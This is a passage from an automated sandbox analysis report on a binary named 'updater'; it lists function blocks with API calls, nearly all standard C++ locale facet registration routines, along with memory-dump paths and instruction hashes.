                                    • GetFileAttributesW.KERNEL32(00000000), ref: 013D3728
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AttributesDelete
                                    • String ID:
                                    • API String ID: 2910425767-0
                                    • Opcode ID: 76bf9b1854f053ec13da80b459bcba266cbcabc33c73190ad063fe99673eebe5
                                    • Instruction ID: 735b4677b4609787294b1d3d8fd39274fdf1dd846797af989083d63d07801bcc
                                    • Opcode Fuzzy Hash: 76bf9b1854f053ec13da80b459bcba266cbcabc33c73190ad063fe99673eebe5
                                    • Instruction Fuzzy Hash: BB01FCFB206E179FC7252A7CBCC466E3A697F46679B120615F663CA1C1CA34CD0143A7
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC144
                                    • int.LIBCPMT ref: 013FC15B
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • messages.LIBCPMT ref: 013FC17E
                                    • std::_Facet_Register.LIBCPMT ref: 013FC195
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC1B5
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC1C2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                    • String ID:
                                    • API String ID: 4267825564-0
                                    • Opcode ID: a3dd5eb84e78998809504382bedcdfb35852d68d0698a3aa906a6cdfa77ffdf0
                                    • Instruction ID: 3a04ad2effd14efdc15204dec2797d2b59151e9ab64ea5222ee415f6e180a936
                                    • Opcode Fuzzy Hash: a3dd5eb84e78998809504382bedcdfb35852d68d0698a3aa906a6cdfa77ffdf0
                                    • Instruction Fuzzy Hash: A701D675D0011A9BCB15EB68D854AFD7B75BFA4718F14040EEA00A73E0DF749E45CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC01A
                                    • int.LIBCPMT ref: 013FC031
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • ctype.LIBCPMT ref: 013FC054
                                    • std::_Facet_Register.LIBCPMT ref: 013FC06B
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC08B
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC098
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
                                    • String ID:
                                    • API String ID: 3097546199-0
                                    • Opcode ID: e1b7cff0efdeed6f45ac3803ea02e9953f958da0c87a1c89b035786e9b4ff47d
                                    • Instruction ID: 41fdba0c8be29a8b1280bee4d4abf2200b4ed77e0e4b7a382937176d32554411
                                    • Opcode Fuzzy Hash: e1b7cff0efdeed6f45ac3803ea02e9953f958da0c87a1c89b035786e9b4ff47d
                                    • Instruction Fuzzy Hash: 2601C47590011A9BCB15EB68D854EBDBB74BFA5318F18450DDA10A73E0DF34DE45C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC0AF
                                    • int.LIBCPMT ref: 013FC0C6
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • messages.LIBCPMT ref: 013FC0E9
                                    • std::_Facet_Register.LIBCPMT ref: 013FC100
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC120
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC12D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                    • String ID:
                                    • API String ID: 4267825564-0
                                    • Opcode ID: efbe3e6a58c7747b28f03bd5260e6fb50941552246b2fe15854302249ca91801
                                    • Instruction ID: da68b4d09dfa2209383b430874ca1c3ea06332b88eb53e98b51c19f92dcc487e
                                    • Opcode Fuzzy Hash: efbe3e6a58c7747b28f03bd5260e6fb50941552246b2fe15854302249ca91801
                                    • Instruction Fuzzy Hash: 8201C07590011A9BCB05AB68D854EADBB74BFA4358F28400DEA10A72E1DF74DE05CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC557
                                    • int.LIBCPMT ref: 013FC56E
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • moneypunct.LIBCPMT ref: 013FC591
                                    • std::_Facet_Register.LIBCPMT ref: 013FC5A8
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC5C8
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC5D5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 13af2bf3fb168c788d6de2367d5c495a6ed6ab7c86c3e47b06c6f3432602f850
                                    • Instruction ID: becdfe22902d3ed89c2c742372ea80fe4b9482504ef40fb88ff11d81c6bbd2c3
                                    • Opcode Fuzzy Hash: 13af2bf3fb168c788d6de2367d5c495a6ed6ab7c86c3e47b06c6f3432602f850
                                    • Instruction Fuzzy Hash: 8501D676D0021ADBCB01EBB8D854ABD7B75BFA4328F14000DEA14672D0DF749E45C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC5EC
                                    • int.LIBCPMT ref: 013FC603
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • moneypunct.LIBCPMT ref: 013FC626
                                    • std::_Facet_Register.LIBCPMT ref: 013FC63D
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC65D
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC66A
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 9f6f237a205a8ea2cead91708375f25a6df6a927c27da2f912ef0c1a6657ff23
                                    • Instruction ID: f4ebb41763e1b747fadbd87c32c4304619a419e2ff37b442001702f7a1d57f03
                                    • Opcode Fuzzy Hash: 9f6f237a205a8ea2cead91708375f25a6df6a927c27da2f912ef0c1a6657ff23
                                    • Instruction Fuzzy Hash: 7F01D675D0011A9BCB05EB68D854EBDBB71BFA4728F28040DEA11672D1DF749E01C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC42D
                                    • int.LIBCPMT ref: 013FC444
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • moneypunct.LIBCPMT ref: 013FC467
                                    • std::_Facet_Register.LIBCPMT ref: 013FC47E
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC49E
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC4AB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: 204c7a71d05b79bef1248abc1b0684f4a1fac7c618c7669c9a2eda7874981b11
                                    • Instruction ID: b000af5f7ba92bfa699e7dda756cb3dbe2b94f81910adb2b7bbdac9354db589f
                                    • Opcode Fuzzy Hash: 204c7a71d05b79bef1248abc1b0684f4a1fac7c618c7669c9a2eda7874981b11
                                    • Instruction Fuzzy Hash: 1401D67190011E9BCB12EF68D854ABDBB74BFA4718F18450DEA04B76D0DF34DA05CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC4C2
                                    • int.LIBCPMT ref: 013FC4D9
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • moneypunct.LIBCPMT ref: 013FC4FC
                                    • std::_Facet_Register.LIBCPMT ref: 013FC513
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC533
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC540
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
                                    • String ID:
                                    • API String ID: 1973839345-0
                                    • Opcode ID: c3df72058151e35ba5124ff440b88809a31c75cfdb841d449ea2a1ae1f88c5d3
                                    • Instruction ID: 812c18805b6d5a58878a73a4933360835354c191b67fddd1439f1313e72fc2ab
                                    • Opcode Fuzzy Hash: c3df72058151e35ba5124ff440b88809a31c75cfdb841d449ea2a1ae1f88c5d3
                                    • Instruction Fuzzy Hash: E901D671D0021ADBCB06EF68D854AFE7B75BFA4328F28011DEA14A72E0DF349A45C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC96A
                                    • int.LIBCPMT ref: 013FC981
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • numpunct.LIBCPMT ref: 013FC9A4
                                    • std::_Facet_Register.LIBCPMT ref: 013FC9BB
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC9DB
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC9E8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                    • String ID:
                                    • API String ID: 1910018792-0
                                    • Opcode ID: 0c8491e6aa0e277937396d222b49913a4168fd62b8d66add676cce18e8251e19
                                    • Instruction ID: 3b172a45eaef1bfe07dbe15d582fb9fb14fd02909f08dfdc87df425d73e6ac6e
                                    • Opcode Fuzzy Hash: 0c8491e6aa0e277937396d222b49913a4168fd62b8d66add676cce18e8251e19
                                    • Instruction Fuzzy Hash: 1601D275D4011A9BCB05EB68D854ABEBB70BFA4358F18050EEA11A77E0DF349E05CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013FC8D5
                                    • int.LIBCPMT ref: 013FC8EC
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • numpunct.LIBCPMT ref: 013FC90F
                                    • std::_Facet_Register.LIBCPMT ref: 013FC926
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013FC946
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013FC953
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                    • String ID:
                                    • API String ID: 1910018792-0
                                    • Opcode ID: 85cfa38026e947357f87201a35ddb233254e1bddb08f604f9074c3f36fd4f9a2
                                    • Instruction ID: bad857b6ad1caef19b003b2d8ff2fc261d624c33199aef519a96ce3609f4728b
                                    • Opcode Fuzzy Hash: 85cfa38026e947357f87201a35ddb233254e1bddb08f604f9074c3f36fd4f9a2
                                    • Instruction Fuzzy Hash: 5B01D27590011A9BCB01EB68D854EFEBBB4BFA4328F18440DEA10A72E1DF749E05C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013F6F50
                                    • int.LIBCPMT ref: 013F6F67
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • ctype.LIBCPMT ref: 013F6F8A
                                    • std::_Facet_Register.LIBCPMT ref: 013F6FA1
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013F6FC1
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013F6FCE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
                                    • String ID:
                                    • API String ID: 3097546199-0
                                    • Opcode ID: 33e8c4b946da43e5aafa2a81a975af54d354c43bedd810321c8b719b83f1f1cd
                                    • Instruction ID: c8105f455df3dc0269f594e32e262e32c146210d5d49edce878ecdbd9b1b2779
                                    • Opcode Fuzzy Hash: 33e8c4b946da43e5aafa2a81a975af54d354c43bedd810321c8b719b83f1f1cd
                                    • Instruction Fuzzy Hash: F001F9B1D002169BCB11EB68D8516FDBB75BFA4368F28040DEA11A73E0DF749E49CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013F6EBB
                                    • int.LIBCPMT ref: 013F6ED2
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • codecvt.LIBCPMT ref: 013F6EF5
                                    • std::_Facet_Register.LIBCPMT ref: 013F6F0C
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013F6F2C
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013F6F39
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
                                    • String ID:
                                    • API String ID: 3595785899-0
                                    • Opcode ID: 9d52058e36280bdee7d072090b49b56c1ba4f1af3f9ec2dbeebdc29098de82c8
                                    • Instruction ID: 1fcd5fab9f2d0fc38d63ee8c507cffe715867e308482c710e13b91efb06bef86
                                    • Opcode Fuzzy Hash: 9d52058e36280bdee7d072090b49b56c1ba4f1af3f9ec2dbeebdc29098de82c8
                                    • Instruction Fuzzy Hash: 8201D6B5D002169BCB11EB68D8556BD7B74BFA4728F14000DEA01A77E0DF74DE45CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 013F710F
                                    • int.LIBCPMT ref: 013F7126
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • numpunct.LIBCPMT ref: 013F7149
                                    • std::_Facet_Register.LIBCPMT ref: 013F7160
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 013F7180
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 013F718D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registernumpunct
                                    • String ID:
                                    • API String ID: 1910018792-0
                                    • Opcode ID: d6325e8f69ee5982bf58507d634ac5e7d17faa1671eea9c81c61886b629c98b3
                                    • Instruction ID: a31e2b349bbda7008555cca6cbe50149ad78a526ddb5ab3b825430601f0508e7
                                    • Opcode Fuzzy Hash: d6325e8f69ee5982bf58507d634ac5e7d17faa1671eea9c81c61886b629c98b3
                                    • Instruction Fuzzy Hash: 2701F571D0011A9BCB11EF68D850AFDBBB1BFA4768F18051DEA11A76E0DF349E05C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 01409428
                                    • int.LIBCPMT ref: 0140943F
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • collate.LIBCPMT ref: 01409462
                                    • std::_Facet_Register.LIBCPMT ref: 01409479
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 01409499
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 014094A6
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercollate
                                    • String ID:
                                    • API String ID: 3223962878-0
                                    • Opcode ID: cd6c223b826a60ccd5bd893536d3b9ba65c66511ad7f4b8e42683b5ce354dff0
                                    • Instruction ID: 88e7d64840e124218fc5e8b3dcfbcc001ad246a327820df61476957d4fa196d4
                                    • Opcode Fuzzy Hash: cd6c223b826a60ccd5bd893536d3b9ba65c66511ad7f4b8e42683b5ce354dff0
                                    • Instruction Fuzzy Hash: 8501D6719001169BCB12EB69D850ABE7B71BFA4358F19442ED914673E1DF34DA05CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 014094BD
                                    • int.LIBCPMT ref: 014094D4
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • messages.LIBCPMT ref: 014094F7
                                    • std::_Facet_Register.LIBCPMT ref: 0140950E
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0140952E
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0140953B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true
                                    • Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_13b0000_updater.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
                                    • String ID:
                                    • API String ID: 4267825564-0
                                    • Opcode ID: 48b02d37227044ffb7ac940581f739c34021e544358c44d6a0c377a251ae3a1a
                                    • Instruction ID: c6cec1c083a366a9af5cd7b0185bfede8030d33207347cc2aedc15e7998bf708
                                    • Opcode Fuzzy Hash: 48b02d37227044ffb7ac940581f739c34021e544358c44d6a0c377a251ae3a1a
                                    • Instruction Fuzzy Hash: 6801F976D0011A9BCB06EB6DD850AFEBB75BFA4728F14041EE904673E2DF349A01C781
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 01409711
                                    • int.LIBCPMT ref: 01409728
                                      • Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
                                      • Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862
                                    • moneypunct.LIBCPMT ref: 0140974B
                                    • std::_Facet_Register.LIBCPMT ref: 01409762
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 01409782
